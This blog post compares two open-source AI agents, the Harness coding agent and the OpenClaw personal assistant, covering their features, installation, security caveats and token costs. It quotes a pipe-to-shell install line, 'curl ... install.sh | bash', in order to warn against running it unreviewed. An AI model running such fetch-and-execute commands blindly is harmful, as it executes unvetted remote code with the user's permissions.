Harness vs. OpenClaw: Two Very Different "Agents"

1982
Created at May 30, 2026 02:28:40
Updated at May 30, 2026 02:30:20

467

If you've been anywhere near AI Twitter lately, you've probably seen two open-source projects throwing off sparks: Harness (the openharness project, published on PyPI as harness-agent) and OpenClaw. Both call themselves "agents," both are open source, and both want access to your machine. But they're built for almost opposite jobs, and lumping them together does a disservice to anyone trying to pick one.

Harness vs. OpenClaw: Two Very Different "Agents"

Here's an honest look at what each one actually is, how you'd install it, and how to think about which (if either) belongs in your workflow.

What is Harness?

Harness is a coding agent — a command-line tool plus a Python SDK that drives an LLM through a read-edit-run loop inside your codebase. You point it at a repo, give it a task ("fix the auth bug," "refactor this module," "run the tests and fix what breaks"), and it works through the problem using a set of built-in tools: reading and writing files, running shell commands, searching code, fetching web pages, and spawning sub-agents for parallel work.

Its main selling point is that it's model-agnostic. The same agent runs on Anthropic's Claude, OpenAI's GPT models, Google's Gemini, or a fully local model through Ollama — you switch with a single flag. That's a meaningful difference from agents that are welded to one provider.

A few features worth calling out: permission modes that range from "ask before every change" to a full auto-approve "bypass" mode for CI; context compaction that summarizes the conversation when you approach the model's limit; an MCP client for connecting external tools like Jira or Slack; and a skills system where you teach it workflows by dropping a Markdown file in a config folder. If that last part sounds familiar, it's because the design borrows heavily from the conventions popularized by tools like Claude Code.

A note on the benchmark claims. The project's README states that Harness scores 100% on "Harness-Bench" and outperforms Claude Code, OpenCode, and pi-mono. Take this with appropriate salt: Harness-Bench is the project's own eight-task benchmark, and a tool topping the test its authors wrote isn't independent evidence of anything. The repo is also young and small at the time of writing. The architecture looks reasonable and the feature list is real — but treat "state of the art" as a marketing claim, not a measured fact, until third-party benchmarks (it does support running SWE-bench) confirm it.

What is OpenClaw?

OpenClaw is a personal assistant agent, and the framing is completely different. Instead of living in your terminal and editing code, it runs on your own machine (Mac, Windows, or Linux) and you talk to it through chat apps you already use — WhatsApp, Telegram, Discord, Slack, Signal, iMessage. You message it like a coworker and it does things: clears your inbox, manages your calendar, browses the web and fills out forms, runs shell commands, and remembers context across conversations.

It's also model-flexible (Claude, GPT, or local models) and heavily extensible through community-built "skills" and plugins, with the agent able to write its own. The project was created by Peter Steinberger and has had a genuinely viral run; its creator has since joined OpenAI while the project continues as open source.

The pitch, distilled: it's the "do things for me in the background" assistant that Siri was supposed to be, but open and running on hardware you control.

The real difference

The cleanest way to see it:

Harness is for builders working in a codebase. It's a developer tool. The output is committed code, fixed bugs, passing tests.
OpenClaw is for automating your personal and digital life. The output is a cleared inbox, a booked appointment, a daily briefing in your Telegram.

They overlap only at the edges — both can run shell commands, both use the MCP ecosystem, both let you define skills in Markdown. But choosing between them as if they compete is a bit like choosing between a power drill and a personal assistant. If you're shipping software, Harness. If you want an always-on agent handling your messages and errands, OpenClaw. Plenty of people in both communities run both, pointing OpenClaw at coding tools like Harness or Claude Code when they want code written from their phone.

Installing them (and a serious caveat first)

Both projects offer the same fashionable one-liner:

curl -fsSL <url>/install.sh | bash

I'd encourage you — and your readers — not to run either blindly. Piping a script straight from the internet into bash executes whatever is in it, with your permissions, no review. For tools this young, download the script and read it first, or use the package-manager path in an isolated environment.

Harness, the safer way:

pip install harness-agent
harness connect          # pick a provider, paste your API key harness "Fix the bug in auth.py"

It requires Python 3.12+. Your API key lands in ~/.harness/config.toml. Be especially careful with --permission bypass, which auto-approves every action including shell commands — convenient for CI, dangerous on a machine you care about.

OpenClaw installs via npm (npm i -g openclaw, then openclaw onboard) and walks you through connecting a model and a chat app. Because it's designed to read your email, control your calendar, and act on your behalf, think hard about what you connect it to. The project's own blog has posts about where its security model is heading, which is a polite way of saying that part is still maturing. Granting an autonomous agent your credentials — or, as some enthusiastic early users have done, your credit card — is not something to do casually.

So which should you use?

Wrong question, most of the time. Decide what you're trying to automate:

Writing, fixing, reviewing, or refactoring code → look at Harness (and compare it honestly against Claude Code and OpenCode, which are more established).
Offloading email, calendar, errands, and digital chores → look at OpenClaw.

Both are early-stage, both are open source, and both ask for a lot of trust in exchange for their power. That trade-off — capability now, security still catching up — is the real story with this generation of agents, and it's worth keeping front of mind no matter which one you reach for.

What about token consumption?

This is the question everyone asks, and the honest answer is that the two tools can't be compared apples-to-apples on tokens — and you should be suspicious of anyone who claims otherwise.

The reason is simple: they do different work. Token usage for any agent is driven by the size of the task, how much context gets loaded, how much conversation history is replayed, and which model is running. A coding task in Harness ("refactor this module") and an assistant task in OpenClaw ("check my email") aren't the same unit of work, so putting their token counts side by side tells you nothing meaningful. Neither project publishes usage figures, and inventing a comparison table would be worse than useless.

What you can do is measure each tool's real usage yourself, within its own domain. Both expose the numbers:

Harness has built-in cost reporting. Inside the REPL, /cost shows token usage and cost for the current session, and /status shows the provider, model, session, and running cost. So for any task you give it, you can read the actual figure straight from the tool:

harness "Fix the failing tests in test_auth.py" # ...agent works...

/cost      # → tokens used and dollar cost for this session

OpenClaw routes through your own API key, so its usage shows up in your provider's dashboard — the Anthropic Console or OpenAI usage page, depending on which model you connected. Run a task, then check the dashboard for the spend in that time window.

The "check my email" example

Worth being clear about: this example only runs on OpenClaw. Harness is a coding agent — its tools are file read/write/edit, shell, search, and web-fetch. It has no email integration, so there's nothing to measure on the Harness side of an inbox task.

On OpenClaw, a realistic way to measure it:

From your chat app (say Telegram), message your assistant: "Check my inbox and summarize anything that needs a reply today."
Let it run — it'll read your mail and respond in the chat.
Open your provider dashboard and note the tokens consumed in that window.

What drives the number, in rough order of impact: how many emails it actually reads (and how long they are), how much of its persistent memory and prior conversation gets replayed into context, and the model you chose — a frontier model like Claude Opus or GPT-5.2 will cost far more per run than a local Ollama model, which is effectively free on tokens but trades off quality and speed.

If you want a genuinely useful comparison for readers, the right experiment is: pick one realistic task per tool's actual domain, run it on the same underlying model, and report the real /cost and dashboard figures. Real measured numbers from your own setup will be far more credible — and more interesting — than any generic claim.

My experience: OpenClaw runs up tokens fast

In my own use, OpenClaw has been a heavy token consumer. That tracks with how it's built: persistent memory and conversation history get replayed into context on each turn, and tasks like reading an inbox pull a lot of raw text in. If you're on a frontier model, that adds up quickly.

It's tempting to assume a coding agent like Harness would therefore be lighter — but I want to be careful here, because I haven't measured it, and the assumption doesn't really hold. Coding agents can be just as token-hungry, sometimes more: they load large files and whole codebases into context, replay them across turns, and spawn sub-agents that each carry their own context. Whether Harness uses fewer tokens than OpenClaw isn't something you can reason out from first principles — it depends entirely on the task, and the only honest way to know is to measure both.

So treat "OpenClaw uses a lot of tokens" as my lived experience, not "Harness uses less" as a conclusion. If you've measured Harness's /cost on real tasks, I'd love to hear your numbers — that's the data that would actually settle it.

Both projects are independent and not affiliated with the model providers they run on. Benchmark figures cited above are self-reported by the Harness project and were not independently verified for this post.

Tags: AI Agents AI Security Agent Comparison Coding Agent Developer Tool Harness Harness Agent LLM Agents Open Source OpenClaw Personal Assistant Token Consumption

◀ PREVIOUS
What is Docker? Why is Docker also useful in a development environment?

Comments 0